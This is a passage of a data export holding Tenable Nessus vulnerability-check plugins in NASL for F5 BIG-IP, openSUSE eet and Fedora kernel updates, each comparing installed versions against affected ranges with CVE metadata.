script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K20022580\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.3.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.0.0\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.0.0\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.0.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.0.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.0.0-11.6.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.0.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.0.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.0.0\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.3.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.0.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:39", "description": "- lz4.patch security fix for CVE-2014-4611", "cvss3": {}, "published": "2014-07-24T00:00:00", "type": "nessus", "title": "openSUSE Security Update : eet (openSUSE-SU-2014:0924-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4611"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:eet", "p-cpe:/a:novell:opensuse:eet-debuginfo", "p-cpe:/a:novell:opensuse:eet-debugsource", "p-cpe:/a:novell:opensuse:eet-devel", "p-cpe:/a:novell:opensuse:eet-doc-html", "p-cpe:/a:novell:opensuse:eet-examples", "p-cpe:/a:novell:opensuse:libeet1", "p-cpe:/a:novell:opensuse:libeet1-debuginfo", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-469.NASL", "href": "https://www.tenable.com/plugins/nessus/76726", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-469.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76726);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-4611\");\n\n script_name(english:\"openSUSE Security Update : eet (openSUSE-SU-2014:0924-1)\");\n script_summary(english:\"Check for the openSUSE-2014-469 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\" - lz4.patch security fix for CVE-2014-4611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-07/msg00025.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected eet packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eet-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eet-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eet-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eet-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eet-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libeet1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libeet1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"eet-1.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"eet-debuginfo-1.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"eet-debugsource-1.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"eet-devel-1.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"eet-doc-html-1.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"eet-examples-1.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libeet1-1.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libeet1-debuginfo-1.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"eet-1.7.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"eet-debuginfo-1.7.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"eet-debugsource-1.7.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"eet-devel-1.7.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"eet-doc-html-1.7.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"eet-examples-1.7.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libeet1-1.7.8-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libeet1-debuginfo-1.7.8-2.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"eet\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:03", "description": "The 4.4.3 update contains a number of important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : kernel-4.4.3-300.fc23 (2016-1642a20327)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2550"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-1642A20327.NASL", "href": "https://www.tenable.com/plugins/nessus/89482", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-1642a20327.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89482);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2550\");\n script_xref(name:\"FEDORA\", value:\"2016-1642a20327\");\n\n script_name(english:\"Fedora 23 : kernel-4.4.3-300.fc23 (2016-1642a20327)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.4.3 update contains a number of important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1311517\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178240.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0e49a5d1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.4.3-300.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:55", "description": "Race condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows local users to gain privileges or cause a denial of service (list corruption or use-after-free) via simultaneous file-descriptor operations that leverage improper might_cancel queueing.\n(CVE-2017-10661)\n\nImpact\n\nA locally logged-in attacker can gain unauthorized access to resources or cause a denial of service (DoS) on a vulnerable system.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (K04337834)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10661"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting"], "id": "F5_BIGIP_SOL04337834.NASL", "href": "https://www.tenable.com/plugins/nessus/151462", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K04337834.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(151462);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\"CVE-2017-10661\");\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (K04337834)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Race condition in fs/timerfd.c in the Linux kernel before 4.10.15\nallows local users to gain privileges or cause a denial of service\n(list corruption or use-after-free) via simultaneous file-descriptor\noperations that leverage improper might_cancel queueing.\n(CVE-2017-10661)\n\nImpact\n\nA locally logged-in attacker can gain unauthorized access to resources\nor cause a denial of service (DoS) on a vulnerable system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K04337834\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K04337834.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K04337834\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.5\",\"14.1.0-14.1.4\",\"13.1.0-13.1.4\",\"12.1.0-12.1.6\",\"11.6.1-11.6.5\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.5.1\",\"14.1.5\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.5\",\"14.1.0-14.1.4\",\"13.1.0-13.1.4\",\"12.1.0-12.1.6\",\"11.6.1-11.6.5\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.5.1\",\"14.1.5\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.5\",\"14.1.0-14.1.4\",\"13.1.0-13.1.4\",\"12.1.0-12.1.6\",\"11.6.1-11.6.5\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.5.1\",\"14.1.5\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.5\",\"14.1.0-14.1.4\",\"13.1.0-13.1.4\",\"12.1.0-12.1.6\",\"11.6.1-11.6.5\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.5.1\",\"14.1.5\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.5\",\"14.1.0-14.1.4\",\"13.1.0-13.1.4\",\"12.1.0-12.1.6\",\"11.6.1-11.6.5\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.5.1\",\"14.1.5\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.5\",\"14.1.0-14.1.4\",\"13.1.0-13.1.4\",\"12.1.0-12.1.6\",\"11.6.1-11.6.5\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.5.1\",\"14.1.5\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.5\",\"14.1.0-14.1.4\",\"13.1.0-13.1.4\",\"12.1.0-12.1.6\",\"11.6.1-11.6.5\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.5.1\",\"14.1.5\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.5\",\"14.1.0-14.1.4\",\"13.1.0-13.1.4\",\"12.1.0-12.1.6\",\"11.6.1-11.6.5\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.5.1\",\"14.1.5\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.5\",\"14.1.0-14.1.4\",\"13.1.0-13.1.4\",\"12.1.0-12.1.6\",\"11.6.1-11.6.5\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.5.1\",\"14.1.5\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:04:34", "description": "The 4.4.4 update contains a number of important fixes across the tree.\nThis also contains an important update for XFS utilities\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "nessus", "title": "Fedora 22 : kernel-4.4.4-200.fc22 (2016-746bb5851d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2847"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-746BB5851D.NASL", "href": "https://www.tenable.com/plugins/nessus/89884", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-746bb5851d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89884);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2847\");\n script_xref(name:\"FEDORA\", value:\"2016-746bb5851d\");\n\n script_name(english:\"Fedora 22 : kernel-4.4.4-200.fc22 (2016-746bb5851d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.4.4 update contains a number of important fixes across the tree.\nThis also contains an important update for XFS utilities\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1313428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1314253\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178711.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e69051e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 